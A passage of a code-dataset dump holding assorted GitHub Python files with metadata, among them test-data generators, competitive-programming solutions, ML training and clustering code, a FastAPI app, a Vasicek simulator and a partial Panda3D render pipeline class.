\"user/getUserInfoById\",\n \"needparam\": True,\n \"param\": []\n }\n param = []\n for i in range(20):\n param.append({\n \"id\":random.randint(0,9)\n })\n getJson['param'] = param\n dataList.append(getJson)\n\n # # login接口\n # loginJson = {\n # \"urlpath\": \"user/login\",\n # \"needparam\": True,\n # \"param\":[]\n # }\n # param = []\n # for i in range(10):\n # param.append(\n # {\n # \"username\": \"testuser\" + str(i),\n # \"password\": \"testuser\" + str(i)\n # }\n # )\n # loginJson['param'] = param\n # dataList.append(loginJson)\n #\n # removeJson = {\n # \"urlpath\": \"user/remove\",\n # \"needparam\": True,\n # \"param\": []\n # }\n # param = []\n # for i in range(20):\n # param.append({\n # \"id\": random.randint(0, 9)\n # })\n # removeJson['param'] = param\n # dataList.append(removeJson)\n\n return dataList\n\n\n\ndef productNotificationData():\n dataList = []\n # add 接口\n addJson = {\n \"urlpath\": \"user/login\",\n \"needparam\": True,\n \"param\": []\n }\n param = []\n for i in range(10):\n param.append({\n \"userid\": i,\n \"name\": \"testuser\" + str(i),\n \"birthday\": \" 2022-01-01-01\",\n \"email\": \"microserivce_userName\" + str(i) + \"@163.com\",\n \"sex\" : random.randint(0, 2),\n \"phone\": \"121231233\" + str(i),\n \"type\" : random.randint(0, 4),\n \"password\" : \"testuser\" + str(i)\n })\n addJson['param'] = param\n dataList.append()\n\n\n\n\nif __name__ == '__main__':\n filename = 'basicuser1'\n dataList = productUserData()\n with open(filename, 'w') as f:\n f.write(str(dataList))\n f.close()\n\n # filename = 'basicuser'\n # f = open(filename, 'r')\n # data = ast.literal_eval(f.read())\n # print(data)","repo_name":"SeptemberHX/MeasuringTools","sub_path":"requestBody/productData.py","file_name":"productData.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19667279647","text":"\"\"\"\r\n割りとシンプルなDFSだったので実装出来なかったのは悔しい\r\nとりあえず実装してからチョロチョロ修正するのが良かったかも\r\n\r\n1. グラフを作ってDFS\r\n1. 行きがけにまず配列に親を追加\r\n1. その後に子のDFSを行って終わったら親を追加して通り道を記録する\r\n1. あとは答えを+1ずつして答える\r\n\"\"\"\r\nimport sys\r\ninput = sys.stdin.readline\r\nsys.setrecursionlimit(10 ** 6)\r\ndef main():\r\n def dfs(v, p=-1):\r\n ans.append(v)\r\n for v2 in g[v]:\r\n if v2 == p: continue\r\n dfs(v2, v)\r\n ans.append(v)\r\n return\r\n n = int(input())\r\n g = [[] for _ in range(n)]\r\n for _ in range(n-1):\r\n a, b = map(int, input().split())\r\n a -= 1\r\n b -= 1\r\n g[a].append(b)\r\n g[b].append(a)\r\n ans = []\r\n for i in range(n):\r\n if not g[i]: continue\r\n g[i].sort()\r\n\r\n dfs(0)\r\n for i in range(len(ans)):\r\n ans[i] += 1\r\n print(*ans)\r\n return\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"kazumasa-torii/atcoder","sub_path":"abc/213/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70911547319","text":"class Cake:\n \"\"\"\n Tutaj jest dekumentowanie klasy\n \"\"\"\n bakery_offer = []\n\n def __init__(self, name, kind, taste, additives, filling):\n \"\"\"\n\n :param name: v\n :param kind: fag\n :param taste: sf\n :param additives: sdd\n :param filling: ddsa\n \"\"\"\n self.name = name\n self.kind = kind\n self.taste = taste\n self.additives = additives.copy()\n self.filling = filling\n self.bakery_offer.append(self)\n\n def show_info(self):\n print(\"{}\".format(self.name.upper()))\n print(\"Kind: {}\".format(self.kind))\n print(\"Taste: {}\".format(self.taste))\n if len(self.additives) > 0:\n print(\"Additives:\")\n for a in self.additives:\n print(\"\\t\\t{}\".format(a))\n if len(self.filling) > 0:\n print(\"Filling: {}\".format(self.filling))\n print('-' * 20)\n\n @property\n def full_name(self):\n \"\"\"\n fdsafm\n :return:fsav\n \"\"\"\n\n return \"--== {} - {} ==--\".format(self.name.upper(), self.kind)\n\nhelp(Cake)\nprint(\"@\"*40)\nhelp(Cake.full_name)","repo_name":"dandeiro1992/kurs_stacjonarka","sub_path":"Lab1/dokumentacja.py","file_name":"dokumentacja.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36039631000","text":"import sys\n\nfrom trezorlib.debuglink import DebugLink\nfrom trezorlib.transport import enumerate_devices\n\n\ndef find_debug() -> DebugLink:\n for device in enumerate_devices():\n try:\n debug_transport = device.find_debug()\n debug = DebugLink(debug_transport, auto_interact=False)\n debug.open()\n return debug\n except Exception:\n continue\n else:\n print(\"No suitable Trezor device found\")\n sys.exit(1)\n\n\ndef main() -> None:\n debug = find_debug()\n debug.memory_write(int(sys.argv[1], 16), bytes.fromhex(sys.argv[2]), flash=True)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"trezor/trezor-firmware","sub_path":"python/tools/mem_write.py","file_name":"mem_write.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":1147,"dataset":"github-code","pt":"40"} +{"seq_id":"21026020082","text":"import os\nimport pickle\nimport shutil\nimport numpy as np\nimport pandas as pd\nimport scipy as sp\nimport torch.nn as nn\nimport torch\n\nfrom src.dataset import TabDataModule\nfrom src.utils.metrics import compute_metrics, dump_metrics\nfrom src.utils.other import apply_model\n\n\nclass Trainer:\n def __init__(\n self,\n model: nn.Module,\n datamodule: TabDataModule,\n optimizer: torch.optim.Optimizer,\n loss_fn: nn.Module,\n run_dir: str\n ):\n self.model = model\n self.datamodule = datamodule\n self.optimizer = optimizer\n self.loss_fn = loss_fn\n self.run_dir = run_dir\n\n self.checkpoints_dir = os.path.join(self.run_dir, 'checkpoints')\n\n def train(self, n_epochs: int, batch_size: int, report_frequency: int):\n self._create_checkpoints_dir()\n self._save_split()\n\n train_dataloader = self.datamodule.get_dataloader('train', batch_size, shuffle=True)\n for epoch in range(1, n_epochs + 1):\n self.model.train()\n\n epoch_losses = []\n for iteration, batch in enumerate(train_dataloader):\n self.optimizer.zero_grad()\n\n x_batch, y_batch = batch\n \n predict = apply_model(self.model, *x_batch)\n predict = predict.squeeze(1)\n\n loss = self.loss_fn(predict, y_batch)\n loss.backward()\n\n epoch_losses.append(loss.detach().cpu().numpy())\n \n self.optimizer.step()\n \n # if iteration % report_frequency == 0:\n # print(f'(epoch) {epoch:3d} (iteration) {iteration:5d} (loss) {loss.item():.4f}')\n\n train_metrics, train_loss = self._evaluate('train', batch_size)\n val_metrics, val_loss = self._evaluate('val', batch_size)\n\n print(\n f'Epoch {epoch:03d} | '\n f'Train auroc {train_metrics[\"auroc\"]:.4f}, auprc: {train_metrics[\"auprc\"]:.4f} | '\n f'Val auroc {val_metrics[\"auroc\"]:.4f}, auprc: {val_metrics[\"auprc\"]:.4f} | '\n f'Loss train {train_loss:.4f}, val {val_loss:.4f}'\n )\n \n self._save_checkpoint(self.model, epoch, self.checkpoints_dir)\n self._save_metrics(\n {'train': train_metrics, 'val': val_metrics},\n {'train': train_loss, 'val': val_loss},\n epoch\n )\n self._save_loss(epoch_losses)\n\n @torch.no_grad()\n def _evaluate(self, part_name: str, batch_size: int):\n self.model.eval()\n\n dataloader = self.datamodule.get_dataloader(part_name, batch_size, shuffle=False)\n\n predict = []\n target = []\n for batch in dataloader:\n x_batch, y_batch = batch\n\n predict.append(apply_model(self.model, *x_batch))\n target.append(y_batch)\n\n predict = torch.cat(predict).squeeze(1).cpu().numpy()\n predict = np.round(sp.special.expit(predict))\n\n target = torch.cat(target).cpu().numpy()\n\n loss = float(self.loss_fn(torch.tensor(predict), torch.tensor(target)).cpu())\n metrics = compute_metrics(predict, target)\n\n return metrics, loss\n \n def _save_split(self):\n save_path = os.path.join(self.run_dir, 'datamodule.pickle')\n\n self.datamodule.split.save(save_path)\n \n def _save_loss(self, epoch_losses: list):\n save_path = os.path.join(self.run_dir, 'loss.npy')\n\n current_losses = np.array(epoch_losses)\n\n if not os.path.exists(save_path):\n np.save(save_path, current_losses)\n else:\n saved_losses = np.load(save_path)\n new_losses = np.concatenate((saved_losses, current_losses))\n\n np.save(save_path, new_losses)\n\n def _save_metrics(self, metrics, loss, epoch: int):\n save_path = os.path.join(self.run_dir, 'train_val_metrics.csv')\n\n current_metrics = pd.DataFrame.from_dict({\n 'epoch': [epoch],\n 'train_auprc': [metrics['train']['auprc']],\n 'val_auprc': [metrics['val']['auprc']],\n 'train_auroc': [metrics['train']['auroc']],\n 'val_auroc': [metrics['val']['auroc']],\n 'train_loss': [loss['train']],\n 'val_loss': [loss['val']],\n })\n\n if not os.path.exists(save_path):\n current_metrics.to_csv(save_path, index=False)\n else:\n saved_metrics = pd.read_csv(save_path)\n new_metrics = pd.concat((saved_metrics, current_metrics))\n\n new_metrics.to_csv(save_path, index=False)\n\n def _create_checkpoints_dir(self):\n if os.path.exists(self.checkpoints_dir):\n shutil.rmtree(self.checkpoints_dir)\n os.makedirs(self.checkpoints_dir)\n\n def _save_checkpoint(\n self,\n model: nn.Module,\n epoch: int,\n experiment_dir: str,\n ): \n checkpoint_path = os.path.join(experiment_dir, f'{str(epoch).zfill(4)}.pt')\n torch.save(\n {\n 'model_state_dict': model.state_dict(),\n 'epoch': epoch\n },\n checkpoint_path\n )\n \n ","repo_name":"daniilkk/TabDL-Credit-Scoring","sub_path":"src/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":5257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9036017578","text":"import time\r\nseconds = input(\"Enter the number of seconds: \")\r\ndef count_down(seconds):\r\n while seconds>0:\r\n mins = int(seconds/60)\r\n sec = int(seconds%60)\r\n timer = f'{mins}:{sec}'\r\n #print(timer)\r\n print(timer,end=\"\\r\")\r\n time.sleep(1) \r\n seconds=seconds-1\r\n print(\"Times Up!!!\")\r\n\r\ncount_down(int(seconds))\r\n\r\n","repo_name":"NamanP18/P110","sub_path":"C110.py","file_name":"C110.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41289776566","text":"#!/usr/bin/env python3\n\"\"\" Optimize k \"\"\"\n\nimport numpy as np\n\nkmeans = __import__('1-kmeans').kmeans\nvariance = __import__('2-variance').variance\n\n\ndef optimum_k(X, kmin=1, kmax=None, iterations=1000):\n \"\"\" tests for the optimum number of clusters by variance\n\n Arguments:\n X ndarray (n, d) dataset to cluster\n n number of data points\n d number of dimensions f0r each data point\n kmin positive int, minimum number of clusters to check f0r (inclusive)\n kmax positive int, maximum number of clusters to check f0r (inclusive)\n iterations positive int, maximum number of iterations f0r K-means\n\n Returns:\n results, d_vars, or None, None on failure\n \"\"\"\n if not isinstance(X, np.ndarray) or len(X.shape) != 2:\n return None, None\n if not isinstance(iterations, int) or iterations <= 0:\n return None, None\n if not isinstance(kmin, int) or kmin <= 0 or X.shape[0] <= kmin:\n return None, None\n if kmax is None:\n kmax = X.shape[0]\n if not isinstance(kmax, int) or kmax <= 0 or X.shape[0] < kmax:\n return None, None\n if kmin >= kmax:\n return None, None\n\n results = []\n d_vars = []\n\n for k in range(kmin, kmax + 1):\n C, clss = kmeans(X, k, iterations)\n\n if C is None or clss is None:\n return None, None\n\n results.append((C, clss))\n d_vars.append(variance(X, C))\n\n max = np.max(d_vars)\n for i in range(len(d_vars)):\n d_vars[i] = abs(d_vars[i] - max)\n\n return results, d_vars\n","repo_name":"tlenormand/holbertonschool-machine_learning","sub_path":"unsupervised_learning/clustering/3-optimum.py","file_name":"3-optimum.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26265300886","text":"import re\nfrom common import read_json_from_file, write_to_file, DATA_FOLDER\nfrom scraper import PREREQ_FILE_PATH\n\nPARSED_PREREQ_PATH = DATA_FOLDER + 'parsed_prereq.txt'\nCOURSE_REGEX = r'[A-Z]{2,4}\\s\\d{3}'\n\nKEYWORD_DICT = {\n '; or': 'or',\n ';': 'and',\n 'One of': 'or',\n 'Any of': 'or'\n}\n\n\ndef remove_prereq_string(prereqs):\n for course, value in prereqs.items():\n prereqs[course] = value[len(\"Prerequisite: \"):]\n\n\ndef get_prereq_from_string(string):\n result = {}\n if string.find('; or') > -1:\n prereqs = string.split('; or')\n temp = []\n for prereq in prereqs:\n res = get_prereq_from_string(prereq)\n if len(res) > 0:\n temp.append(res)\n if len(temp) == 1:\n return temp[0]\n else:\n result[KEYWORD_DICT['; or']] = temp\n elif string.find('; ') > -1:\n prereqs = string.split('; ')\n temp = []\n for prereq in prereqs:\n res = get_prereq_from_string(prereq)\n if len(res) > 0:\n temp.append(res)\n if len(temp) == 1:\n return temp[0]\n else:\n result[KEYWORD_DICT[';']] = temp\n elif string.find('One of') > -1 or string.find(' or ') > -1 or string.find('Any of') > -1:\n courses = re.findall(COURSE_REGEX, string)\n if len(courses) > 1:\n result['or'] = courses\n elif len(courses) > 0:\n return courses[0]\n else:\n return []\n elif string.find(' and ') > -1:\n courses = re.findall(COURSE_REGEX, string)\n if len(courses) > 1:\n result['and'] = courses\n elif len(courses) > 0:\n return courses[0]\n else:\n return []\n else:\n temp = re.findall(COURSE_REGEX, string)\n if len(temp) == 1:\n return temp[0]\n else:\n return temp\n return result\n\n\nif __name__ == \"__main__\":\n prereqs = read_json_from_file(PREREQ_FILE_PATH)\n merged = {}\n for d in prereqs:\n merged.update(d)\n prereqs = merged\n remove_prereq_string(prereqs)\n\n courses_to_remove = []\n for course, value in prereqs.items():\n classes = re.findall(COURSE_REGEX, value)\n if len(classes) == 0:\n courses_to_remove.append(course)\n [prereqs.pop(course) for course in courses_to_remove]\n\n converted_prereq = {}\n for course, prereq in prereqs.items():\n converted_prereq[course] = get_prereq_from_string(prereq)\n\n for course in converted_prereq:\n print(course)\n print(prereqs[course])\n print(converted_prereq[course])\n print('')\n\n write_to_file(converted_prereq, PARSED_PREREQ_PATH)\n","repo_name":"suoigwg/cs411-gpa-by-class","sub_path":"prereq/prereq.py","file_name":"prereq.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"23983680547","text":"import pytest\nfrom _pytest.fixtures import FixtureRequest\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom webdriver_manager.utils import ChromeType\n\nfrom ui.pages.login_page import LoginPage\nfrom ui.pages.welcome_page import WelcomePage\n\n\n@pytest.fixture(scope='function')\ndef driver(app_full_url, request: FixtureRequest):\n selenoid = request.config.getoption('--selenoid')\n\n if selenoid:\n capabilities = {\n \"browserName\": \"chrome\",\n \"browserVersion\": \"87.0\",\n \"selenoid:options\": {\n \"enableVNC\": True,\n \"enableVideo\": False\n }\n }\n driver = webdriver.Remote(\n command_executor=\"http://{}/wd/hub\".format(selenoid),\n desired_capabilities=capabilities)\n else:\n manager = ChromeDriverManager(chrome_type=ChromeType.CHROMIUM, log_level=0)\n driver = webdriver.Chrome(manager.install())\n\n driver.maximize_window()\n driver.get(app_full_url)\n yield driver\n driver.quit()\n\n\n@pytest.fixture(scope='function')\ndef welcome_page(new_user, driver):\n LoginPage(driver).auth(new_user.username, new_user.password)\n\n return WelcomePage(driver)\n","repo_name":"Onethity/2020-2-Atom-QA-Python-D-Lukianov","sub_path":"Final project/ui/fixtures.py","file_name":"fixtures.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70627712440","text":"from fastapi import Depends, FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\n\nfrom routers import user\nfrom routers import emailreport\nfrom routers import user\nfrom routers import timezone, tz_conversion\n\nfrom routers import news\nfrom routers import notifications\nfrom routers import filtersort\n\nfrom routers import location\nfrom routers import wordAnalysis\nfrom routers import login, registration, dummyhome\nimport db\nfrom add_activity_api.main import app as add_activity_app\nfrom routers.on_twitter import api_on_twitter\n\n\n\napp = FastAPI()\napp.include_router(add_activity_app)\n@app.get(\"/docs\", include_in_schema=False)\nasync def custom_swagger_ui_html(req):\n root_path = req.scope.get(\"root_path\", \"\").rstrip(\"/\")\n openapi_url = root_path+ 'api/' + app.openapi_url\n return get_swagger_ui_html(\n openapi_url=openapi_url,\n title=\"API\",\n )\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=['*'],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\napp.include_router(\n user.router,\n prefix=\"/user\",\n tags=[\"user\"],\n)\n\napp.include_router(\n\n\n emailreport.router,\n prefix=\"/emailreport\",\n tags=[\"emailreport\"],\n)\n\n\napp.include_router(\n timezone.router,\n prefix=\"/timezone\",\n tags=[\"timezone\"],\n)\n\napp.include_router(\n wordAnalysis.router,\n prefix=\"/word\",\n tags=[\"word\"],\n)\napp.include_router(\n tz_conversion.router,\n prefix=\"/tz_conversion\",\n tags=[\"tz_conversion\"],\n\n)\n\napp.include_router(\n notifications.router,\n prefix=\"/notifications\",\n tags=[\"notifications\"],\n)\napp.include_router(\n\n filtersort.router,\n prefix=\"/filtersort\",\n tags=[\"filtersort\"],\n)\napp.include_router(\n news.router,\n prefix=\"/news\",\n tags=[\"news\"], \n)\napp.include_router(\n location.router,\n prefix=\"/location\",\n tags=[\"location\"],\n)\n\napp.include_router(\n registration.router,\n prefix=\"/registration\",\n tags=[\"registration\"],\n)\n\napp.include_router(\n login.router,\n prefix=\"/login\",\n tags=[\"login\"],\n)\n\napp.include_router(\n dummyhome.router,\n prefix=\"/dummyhome\",\n tags=[\"dummyhome\"],\n)\n@app.get(\"/\")\nasync def root():\n return {\"message\": \"Hello Bigger Applications, check!\"}\n\n@app.get(\"/ping\")\nasync def root():\n return {\"message\": \"pong\"}\n\n@app.get(\"/dbtest\")\nasync def dbtest():\n hasan = []\n cur = db.conn.cursor()\n cur.execute(\"SELECT username FROM user_details\")\n for row in cur:\n for i in row:\n hasan.append(i)\n return{\"message\": hasan}\n\napp.include_router(\n api_on_twitter.router,\n prefix=\"/on-twitter\",\n tags=[\"on-twitter\"],\n)\n\n","repo_name":"bounswe/bounswe2023group2","sub_path":"practice-app/server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"13016179242","text":"import zmq\r\nimport random\r\n\r\ncontext = zmq.Context()\r\n\r\n\r\ndef random_word():\r\n word_list = []\r\n with open('gen_z_slang_words.txt', \"r\", encoding=\"utf-8-sig\") as file:\r\n for line in file:\r\n word_list.append(line.strip('\\n'))\r\n word = random.choice(word_list)\r\n return word\r\n\r\nrand_word = random_word()\r\n\r\n#Socket to talk to server\r\nprint(\"\\nDisclosure: Your information is private and will not be recorded\")\r\nprint(\"(If the generator is not working you can also go to https://dadjokegenerator.com/)\\n\")\r\nprint(\"Your Random Dad Joke is:\")\r\nsocket = context.socket(zmq.REQ)\r\nsocket.connect(\"tcp://localhost:5555\")\r\n\r\nfrom dadjokes import Dadjoke\r\ndadjoke = Dadjoke()\r\nprint(dadjoke.joke)\r\n\r\nsocket.send_string(rand_word)\r\n\r\n# Get the reply.\r\nmessage = socket.recv()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"TeresitaCGNader/CS-361-group-project","sub_path":"receive.py","file_name":"receive.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21766114341","text":"from typing import Union\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom PyCurve.curve import Curve\n\nfrom PyCurve.simulation import Simulation\n\n\n\n\nclass Vasicek:\n\n def __init__(self, alpha: float, beta: float, sigma: float, rt: float, time: float, delta_time: float) -> None:\n self._alpha = alpha\n self._beta = beta\n self._sigma = sigma\n self._rt = rt\n self._dt = delta_time\n self._steps = int(time / delta_time)\n\n def get_attr(self, attr: str) -> Union[float, int]:\n return self.__getattribute__(attr)\n\n def _sigma_part(self, n: int) -> float:\n return self.get_attr(\"_sigma\") * np.sqrt(self.get_attr(\"_dt\")) * np.random.normal(size=n)\n\n def _mu_dt(self, rt: np.ndarray) -> float:\n return self.get_attr(\"_alpha\") * (self.get_attr(\"_beta\") - rt) * self.get_attr(\"_dt\")\n\n def simulate_paths(self, n: int) -> np.array:\n simulation = np.zeros(shape=(self.get_attr(\"_steps\"), n))\n simulation[0, :] = self._rt\n for i in range(1, self.get_attr(\"_steps\"), 1):\n dr = self._mu_dt(simulation[i - 1, :]) + self._sigma_part(n)\n simulation[i, :] = simulation[i - 1, :] + dr\n return Simulation(simulation, self.get_attr(\"_dt\"))\n\n @staticmethod\n def plot_calibrated(simul: Simulation, instantaneous_forward: Curve) -> None:\n fig = plt.figure(figsize=(12.5, 8))\n fig.suptitle(\"Model Fitting Curve T=0\")\n fig.canvas.set_window_title('Model Fitting Curve T=0')\n ax1 = fig.add_subplot(111)\n ax1.set_xlabel('t, years')\n ax1.set_ylabel('Yield')\n ax1.plot(np.linspace(1, simul.get_steps, simul.get_steps) * simul.get_dt,\n simul.get_sim, lw=0.5)\n ax1.plot(np.linspace(1, simul.get_steps, simul.get_steps) * simul.get_dt,\n simul.yield_curve().get_rate, lw=3, c=\"Navy\", label=\"Vasicek Term Structure\")\n ax1.plot(instantaneous_forward.get_time, instantaneous_forward.get_rate, c=\"darkred\",\n label=\"Initial Term Structure\", lw=3)\n plt.legend()\n plt.show()\n return fig\n","repo_name":"ahgperrin/PyCurve","sub_path":"src/PyCurve/vasicek.py","file_name":"vasicek.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"40"} +{"seq_id":"20954320757","text":"def merge(x, y):\n z = x + y\n # first variant works but not good\n # flag = False\n # while not flag:\n # flag = True\n # for i in range(len(z) - 1):\n # if z[i] > z[i + 1]:\n # flag = False\n # (z[i], z[i + 1]) = (z[i + 1], z[i])\n # second variant\n i = j = 0\n for k in range(len(z)):\n if i > len(x) - 1:\n z[k] = y[j]\n j += 1\n elif j > len(y) - 1:\n z[k] = x[i]\n i += 1\n elif x[i] < y[j]:\n z[k] = x[i]\n i += 1\n else:\n z[k] = y[j]\n j += 1\n return z\n\n\na = list(map(int, input().split()))\nb = list(map(int, input().split()))\nc = merge(a, b)\nprint(*c)\n","repo_name":"dlogushiv/courseraBasePythonCourse","sub_path":"Week-6/1-JoinLists.py","file_name":"1-JoinLists.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43563534189","text":"import sys\nimport time\n\nfrom panda3d.core import LVecBase2i, TransformState, RenderState, load_prc_file\nfrom panda3d.core import PandaSystem\nfrom direct.showbase.ShowBase import ShowBase\nfrom direct.stdpy.file import isfile, open\n\nfrom .Globals import Globals\nfrom .PipelineExtensions import PipelineExtensions\nfrom .CommonResources import CommonResources\nfrom .CommonStages import CommonStages\nfrom .Native import TagStateManager\nfrom .RenderTarget import RenderTarget\n\nfrom .Util.DebugObject import DebugObject\nfrom .Util.SettingsLoader import SettingsLoader\nfrom .Util.NetworkUpdateListener import NetworkUpdateListener\nfrom .GUI.OnscreenDebugger import OnscreenDebugger\nfrom .Effects.EffectLoader import EffectLoader\nfrom .PluginInterface.PluginManager import PluginManager\nfrom .DayTime.DayTimeManager import DayTimeManager\n\nfrom .Managers.MountManager import MountManager\nfrom .Managers.StageManager import StageManager\nfrom .Managers.LightManager import LightManager\nfrom .Managers.IESProfileManager import IESProfileManager\n\nclass RenderPipeline(PipelineExtensions, DebugObject):\n\n \"\"\" This is the main pipeline logic, it combines all components of the\n pipeline to form a working system. It does not do much work itself, but\n instead setups all the managers and systems to be able to do their work.\n\n It also derives from RPExtensions to provide some useful functions like\n creating a default skybox or loading effect files. \"\"\"\n\n def __init__(self, showbase):\n \"\"\" Creates a new pipeline with a given showbase instance. This should\n be done before intializing the ShowBase, the pipeline will take care of\n that. \"\"\"\n DebugObject.__init__(self, \"RenderPipeline\")\n self.debug(\"Using Python {} with architecture {}\".format(\n sys.version_info.major, PandaSystem.get_platform()))\n self._showbase = showbase\n self._mount_mgr = MountManager(self)\n self._settings = SettingsLoader(self, \"Pipeline Settings\")\n self.set_default_loading_screen()\n\n def load_settings(self, path):\n \"\"\" Loads the pipeline configuration from a given filename. Usually\n this is the 'Config/pipeline.ini' file. If you call this more than once,\n only the settings of the last file will be used. \"\"\"\n self._settings.load_from_file(path)\n\n def get_setting(self, setting_name):\n \"\"\" Returns a handle to the settings, returns an empty PipelineSettings\n object if no settings have been loaded so far. \"\"\"\n return self._settings[setting_name]\n\n def reload_shaders(self):\n \"\"\" Reloads all shaders \"\"\"\n self.debug(\"Reloading shaders ..\")\n self._debugger.get_error_msg_handler().clear_messages()\n self._debugger.set_reload_hint_visible(True)\n self._showbase.graphicsEngine.render_frame()\n self._showbase.graphicsEngine.render_frame()\n\n self._tag_mgr.cleanup_states()\n self._stage_mgr.set_shaders()\n self._light_mgr.reload_shaders()\n\n # Set the default effect on render and trigger the reload hook\n self.set_effect(Globals.render, \"Effects/Default.yaml\", {}, -10)\n self._plugin_mgr.trigger_hook(\"on_shader_reload\")\n self._debugger.set_reload_hint_visible(False)\n\n def create(self):\n \"\"\" This creates the pipeline, and setups all buffers. It also\n constructs the showbase. The settings should have been loaded before\n calling this, and also the base and write path should have been\n initialized properly (see MountManager). \"\"\"\n\n start_time = time.time()\n\n if not self._mount_mgr.is_mounted:\n self.debug(\"Mount manager was not mounted, mounting now ...\")\n self._mount_mgr.mount()\n\n if not self._settings.is_file_loaded():\n self.debug(\"No settings loaded, loading from default location\")\n self._settings.load_from_file(\"$$Config/pipeline.yaml\")\n\n # Check if the pipeline was properly installed, before including anything else\n if not isfile(\"Data/install.flag\"):\n DebugObject.global_error(\"CORE\", \"You didn't setup the pipeline yet! Please run setup.py.\")\n sys.exit(1)\n\n # Load the default prc config\n load_prc_file(\"$$Config/configuration.prc\")\n\n # Construct the showbase and init global variables\n ShowBase.__init__(self._showbase)\n self._init_globals()\n\n # Create the loading screen\n self._loading_screen.create()\n self._adjust_camera_settings()\n self._create_managers()\n\n # Init the onscreen debugger\n self._init_debugger()\n\n # Load plugins and daytime settings\n self._plugin_mgr.load_plugins()\n self._daytime_mgr.load_settings()\n self._com_resources.write_config()\n\n # Setup common defines\n self._create_common_defines()\n\n # Let the plugins setup their stages\n self._plugin_mgr.trigger_hook(\"on_stage_setup\")\n self._setup_managers()\n self._plugin_mgr.trigger_hook(\"on_pipeline_created\")\n\n # Set the default effect on render\n self.set_effect(Globals.render, \"Effects/Default.yaml\", {}, -10)\n\n # Hide the loading screen\n self._loading_screen.remove()\n\n self._start_listener()\n\n # Measure how long it took to initialize everything\n init_duration = int((time.time() - start_time) * 1000.0)\n self.debug(\"Finished initialization in {} ms\".format(init_duration))\n\n def _create_managers(self):\n \"\"\" Internal method to create all managers and instances\"\"\"\n self._tag_mgr = TagStateManager(Globals.base.cam)\n self._plugin_mgr = PluginManager(self)\n self._effect_loader = EffectLoader()\n self._stage_mgr = StageManager(self)\n self._light_mgr = LightManager(self)\n self._daytime_mgr = DayTimeManager(self)\n self._ies_profile_mgr = IESProfileManager(self)\n\n # Load commonly used resources\n self._com_resources = CommonResources(self)\n self._com_stages = CommonStages(self)\n\n def _setup_managers(self):\n \"\"\" Internal method to setup all managers \"\"\"\n self._stage_mgr.setup()\n self._stage_mgr.set_shaders()\n self._light_mgr.reload_shaders()\n self._init_bindings()\n self._light_mgr.init_shadows()\n\n def _init_debugger(self):\n \"\"\" Internal method to initialize the GUI-based debugger \"\"\"\n if self.get_setting(\"pipeline.display_debugger\"):\n self._debugger = OnscreenDebugger(self)\n else:\n # Use an empty onscreen debugger in case the debugger is not\n # enabled, which defines all member functions as empty lambdas\n class _empty_class(object):\n def __getattr__(self, *args, **kwargs):\n return lambda *args, **kwargs: None\n self._debugger = _empty_class()\n\n def _init_globals(self):\n \"\"\" Inits all global bindings \"\"\"\n Globals.load(self._showbase)\n Globals.resolution = LVecBase2i(\n self._showbase.win.get_x_size(),\n self._showbase.win.get_y_size())\n\n # Connect the render target output function to the debug object\n RenderTarget.RT_OUTPUT_FUNC = lambda *args: DebugObject.global_warn(\n \"RenderTarget\", *args[1:])\n\n def _init_bindings(self):\n \"\"\" Inits the tasks and keybindings \"\"\"\n \n # Add a hotkey to reload the shaders, but only if the debugger is enabled\n if self.get_setting(\"pipeline.display_debugger\"):\n self._showbase.accept(\"r\", self.reload_shaders)\n \n self._showbase.addTask(self._manager_update_task, \"RP_UpdateManagers\", sort=10)\n self._showbase.addTask(self._plugin_pre_render_update, \"RP_Plugin_BeforeRender\", sort=12)\n self._showbase.addTask(self._plugin_post_render_update, \"RP_Plugin_AfterRender\", sort=1000)\n self._showbase.taskMgr.doMethodLater(0.5, self._clear_state_cache, \"RP_ClearStateCache\")\n\n def _clear_state_cache(self, task=None):\n \"\"\" Task which repeatedly clears the state cache to avoid storing\n unused states. \"\"\"\n task.delayTime = 1.0\n TransformState.clear_cache()\n RenderState.clear_cache()\n return task.again\n\n def _start_listener(self):\n \"\"\" Starts a listener thread which listens for incoming connections to\n trigger a shader reload. This is used by the Plugin Configurator to dynamically\n update settings. \"\"\"\n self._listener = NetworkUpdateListener(self)\n self._listener.setup()\n\n def 